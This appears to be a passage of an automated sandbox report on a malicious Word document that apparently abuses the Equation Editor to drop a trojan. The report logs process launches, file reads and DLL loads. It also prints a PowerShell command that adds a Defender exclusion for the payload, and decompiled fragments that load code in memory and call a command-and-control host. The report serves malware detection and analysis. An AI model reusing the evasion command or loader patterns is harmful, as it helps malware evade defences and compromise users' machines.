                Source: 5.2.obibingf24242.exe.37e2170.7.raw.unpack, D0OGH51qG7TrJUYkAK.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 5.2.obibingf24242.exe.37e2170.7.raw.unpack, D0OGH51qG7TrJUYkAK.csSecurity API names: _0020.AddAccessRule
                Source: 5.2.obibingf24242.exe.f30000.1.raw.unpack, D0OGH51qG7TrJUYkAK.csSecurity API names: _0020.SetAccessControl
                Source: 5.2.obibingf24242.exe.f30000.1.raw.unpack, D0OGH51qG7TrJUYkAK.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 5.2.obibingf24242.exe.f30000.1.raw.unpack, D0OGH51qG7TrJUYkAK.csSecurity API names: _0020.AddAccessRule
                Source: 5.2.obibingf24242.exe.3796750.8.raw.unpack, D0OGH51qG7TrJUYkAK.csSecurity API names: _0020.SetAccessControl
                Source: 5.2.obibingf24242.exe.3796750.8.raw.unpack, D0OGH51qG7TrJUYkAK.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 5.2.obibingf24242.exe.3796750.8.raw.unpack, D0OGH51qG7TrJUYkAK.csSecurity API names: _0020.AddAccessRule
                Source: 5.2.obibingf24242.exe.265b624.3.raw.unpack, ClientSocket.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                Source: 5.2.obibingf24242.exe.265b624.3.raw.unpack, ClientSocket.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 5.2.obibingf24242.exe.2665904.6.raw.unpack, ClientSocket.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                Source: 5.2.obibingf24242.exe.2665904.6.raw.unpack, ClientSocket.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winDOC@9/13@619/3
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\Desktop\~$NK PAYMENT COPY.docJump to behavior
                Source: C:\Users\user\AppData\Roaming\obibingf24242.exeMutant created: NULL
                Source: C:\Users\user\AppData\Roaming\obibingf24242.exeMutant created: \Sessions\1\BaseNamedObjects\lsODhik7XANOkJAK
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRE5CC.tmpJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................$.........................s............................................Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P............................."$.........................s............H...............................Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............................;$.........................s............................................Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............................H$.........................s............H...............................Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P............................._$.........................s............................................Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............................q$.........................s............H...............................Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................a.g.a.i.n................................$.........................s............H...............................Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................$.........................s............H...............................Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.1..........$.........................s............H....... .......................Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................@........$.........................s............H...............................Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................@........$.........................s............................................Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................%.........................s............H...............................Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................+. .~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~......%.........................s............H.......$.......................Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............................%%.........................s............H...............................Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............................8%.........................s............................................Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............................D%.........................s............H...............................Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ . . .m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n..................s............H.......2.......................Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............................c%.........................s............H...............................Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............................v%.........................s....................l.......................Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................%.........................s............H...............................Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ .......(.P..............................%.........................s............H...............................Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................%.........................s............H...............................Jump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\AppData\Roaming\obibingf24242.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\AppData\Roaming\obibingf24242.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\AppData\Roaming\obibingf24242.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\AppData\Roaming\obibingf24242.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\AppData\Roaming\obibingf24242.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\AppData\Roaming\obibingf24242.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\AppData\Roaming\obibingf24242.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\AppData\Roaming\obibingf24242.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\AppData\Roaming\obibingf24242.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\AppData\Roaming\obibingf24242.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\AppData\Roaming\obibingf24242.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\AppData\Roaming\obibingf24242.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\AppData\Roaming\obibingf24242.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\AppData\Roaming\obibingf24242.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\AppData\Roaming\obibingf24242.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\AppData\Roaming\obibingf24242.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\AppData\Roaming\obibingf24242.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\AppData\Roaming\obibingf24242.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\AppData\Roaming\obibingf24242.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\AppData\Roaming\obibingf24242.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\AppData\Roaming\obibingf24242.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\AppData\Roaming\obibingf24242.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\AppData\Roaming\obibingf24242.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\AppData\Roaming\obibingf24242.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\AppData\Roaming\obibingf24242.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\AppData\Roaming\obibingf24242.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\AppData\Roaming\obibingf24242.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\AppData\Roaming\obibingf24242.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\AppData\Roaming\obibingf24242.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\AppData\Roaming\obibingf24242.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\AppData\Roaming\obibingf24242.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\AppData\Roaming\obibingf24242.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\AppData\Roaming\obibingf24242.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\AppData\Roaming\obibingf24242.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\AppData\Roaming\obibingf24242.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\AppData\Roaming\obibingf24242.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\AppData\Roaming\obibingf24242.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\AppData\Roaming\obibingf24242.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\AppData\Roaming\obibingf24242.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\AppData\Roaming\obibingf24242.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\AppData\Roaming\obibingf24242.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\AppData\Roaming\obibingf24242.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\AppData\Roaming\obibingf24242.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\AppData\Roaming\obibingf24242.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\AppData\Roaming\obibingf24242.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\AppData\Roaming\obibingf24242.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\AppData\Roaming\obibingf24242.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\AppData\Roaming\obibingf24242.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\AppData\Roaming\obibingf24242.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\AppData\Roaming\obibingf24242.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: obibingf24242.exe, 00000005.00000000.419128523.00000000011E2000.00000020.00000001.01000000.00000004.sdmp, obibingf24242.exe.2.dr, vnobizxc[1].exe.2.drBinary or memory string: INSERT INTO Product(Id, Name, Units, Price, CategoryId)VALUES (@id, @name, @units, @price, @idcat); SELECT last_insert_rowid()
                Source: BANK PAYMENT COPY.docReversingLabs: Detection: 55%
                Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\obibingf24242.exe "C:\Users\user\AppData\Roaming\obibingf24242.exe"
                Source: C:\Users\user\AppData\Roaming\obibingf24242.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\obibingf24242.exe"
                Source: C:\Users\user\AppData\Roaming\obibingf24242.exeProcess created: C:\Users\user\AppData\Roaming\obibingf24242.exe "C:\Users\user\AppData\Roaming\obibingf24242.exe"
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\obibingf24242.exe "C:\Users\user\AppData\Roaming\obibingf24242.exe"Jump to behavior
                Source: C:\Users\user\AppData\Roaming\obibingf24242.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\obibingf24242.exe"Jump to behavior
                Source: C:\Users\user\AppData\Roaming\obibingf24242.exeProcess created: C:\Users\user\AppData\Roaming\obibingf24242.exe "C:\Users\user\AppData\Roaming\obibingf24242.exe"Jump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: wow64win.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: wow64cpu.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: msi.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: cryptsp.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: rpcrtremote.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dwmapi.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: version.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: secur32.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: winhttp.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: webio.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: iphlpapi.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: winnsi.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dnsapi.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: nlaapi.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dhcpcsvc6.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dhcpcsvc.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: rasadhlp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\obibingf24242.exeSection loaded: wow64win.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\obibingf24242.exeSection loaded: wow64cpu.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\obibingf24242.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\obibingf24242.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\obibingf24242.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\obibingf24242.exeSection loaded: bcrypt.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\obibingf24242.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\obibingf24242.exeSection loaded: windowscodecs.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\obibingf24242.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\obibingf24242.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\obibingf24242.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\obibingf24242.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\obibingf24242.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\obibingf24242.exeSection loaded: rpcrtremote.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wow64win.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wow64cpu.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcrypt.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\obibingf24242.exeSection loaded: wow64win.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\obibingf24242.exeSection loaded: wow64cpu.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\obibingf24242.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\obibingf24242.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\obibingf24242.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\obibingf24242.exeSection loaded: bcrypt.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\obibingf24242.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\obibingf24242.exeSection loaded: wbemcomn2.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\obibingf24242.exeSection loaded: rpcrtremote.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\obibingf24242.exeSection loaded: dwmapi.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\obibingf24242.exeSection loaded: ntdsapi.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\obibingf24242.exeSection loaded: rasapi32.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\obibingf24242.exeSection loaded: rasman.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\obibingf24242.exeSection loaded: rtutils.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\obibingf24242.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\obibingf24242.exeSection loaded: webio.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\obibingf24242.exeSection loaded: credssp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\obibingf24242.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\obibingf24242.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\obibingf24242.exeSection loaded: dhcpcsvc6.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\obibingf24242.exeSection loaded: dhcpcsvc.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\obibingf24242.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\obibingf24242.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\obibingf24242.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\obibingf24242.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\obibingf24242.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\obibingf24242.exeSection loaded: avicap32.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\obibingf24242.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\obibingf24242.exeSection loaded: msvfw32.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: wow64win.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: wow64cpu.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: msi.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: cryptsp.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: rpcrtremote.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dwmapi.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\obibingf24242.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\InProcServer32Jump to behavior
                Source: BANK PAYMENT COPY.LNK.0.drLNK file: ..\..\..\..\..\Desktop\BANK PAYMENT COPY.doc
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: C:\Users\user\AppData\Roaming\obibingf24242.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItemsJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
                Source: Binary string: fSgG.pdbSHA256 source: EQNEDT32.EXE, 00000002.00000002.420099253.000000000028F000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000002.420099253.00000000002ED000.00000004.00000020.00020000.00000000.sdmp, obibingf24242.exe, 00000005.00000000.419128523.00000000011E2000.00000020.00000001.01000000.00000004.sdmp, obibingf24242.exe.2.dr, vnobizxc[1].exe.2.dr
                Source: Binary string: fSgG.pdb source: EQNEDT32.EXE, EQNEDT32.EXE, 00000002.00000002.420099253.000000000028F000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000002.420099253.00000000002ED000.00000004.00000020.00020000.00000000.sdmp, obibingf24242.exe, 00000005.00000000.419128523.00000000011E2000.00000020.00000001.01000000.00000004.sdmp, obibingf24242.exe.2.dr, vnobizxc[1].exe.2.dr

                Data Obfuscation

                barindex
                Source: 5.2.obibingf24242.exe.2665904.6.raw.unpack, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
                Source: 5.2.obibingf24242.exe.2665904.6.raw.unpack, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
                Source: 5.2.obibingf24242.exe.2665904.6.raw.unpack, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { Pack[2] }}, (string[])null, (Type[])null, (bool[])null, true)
                Source: 5.2.obibingf24242.exe.265b624.3.raw.unpack, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
                Source: 5.2.obibingf24242.exe.265b624.3.raw.unpack, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
                Source: 5.2.obibingf24242.exe.265b624.3.raw.unpack, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { Pack[2] }}, (string[])null, (Type[])null, (bool[])null, true)
                Source: vnobizxc[1].exe.2.dr, Form1.cs.Net Code: InitializeComponent
                Source: obibingf24242.exe.2.dr, Form1.cs.Net Code: InitializeComponent
                Source: 5.2.obibingf24242.exe.410000.0.raw.unpack, QBy45BY4uMbUQs88Qq.cs.Net Code: KmDc5Q9bs System.Reflection.Assembly.Load(byte[])
                Source: 5.2.obibingf24242.exe.2665904.6.raw.unpack, Messages.cs.Net Code: Plugin System.AppDomain.Load(byte[])
                Source: 5.2.obibingf24242.exe.2665904.6.raw.unpack, Messages.cs.Net Code: Memory System.AppDomain.Load(byte[])
                Source: 5.2.obibingf24242.exe.2665904.6.raw.unpack, Messages.cs.Net Code: Memory
                Source: 5.2.obibingf24242.exe.26e4c5c.5.raw.unpack, QBy45BY4uMbUQs88Qq.cs.Net Code: KmDc5Q9bs System.Reflection.Assembly.Load(byte[])
                Source: 5.2.obibingf24242.exe.3796750.8.raw.unpack, D0OGH51qG7TrJUYkAK.cs.Net Code: mXM9LNPFbq System.Reflection.Assembly.Load(byte[])
                Source: 5.2.obibingf24242.exe.26d8818.4.raw.unpack, QBy45BY4uMbUQs88Qq.cs.Net Code: KmDc5Q9bs System.Reflection.Assembly.Load(byte[])
                Source: 5.2.obibingf24242.exe.37e2170.7.raw.unpack, D0OGH51qG7TrJUYkAK.cs.Net Code: mXM9LNPFbq System.Reflection.Assembly.Load(byte[])
                Source: 5.2.obibingf24242.exe.f30000.1.raw.unpack, D0OGH51qG7TrJUYkAK.cs.Net Code: mXM9LNPFbq System.Reflection.Assembly.Load(byte[])
                Source: 5.2.obibingf24242.exe.265b624.3.raw.unpack, Messages.cs.Net Code: Plugin System.AppDomain.Load(byte[])
                Source: 5.2.obibingf24242.exe.265b624.3.raw.unpack, Messages.cs.Net Code: Memory System.AppDomain.Load(byte[])
                Source: 5.2.obibingf24242.exe.265b624.3.raw.unpack, Messages.cs.Net Code: Memory
                Source: vnobizxc[1].exe.2.drStatic PE information: 0xBE7B7599 [Wed Apr 8 23:41:13 2071 UTC]
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_002A596A push esi; ret 2_2_002A596B
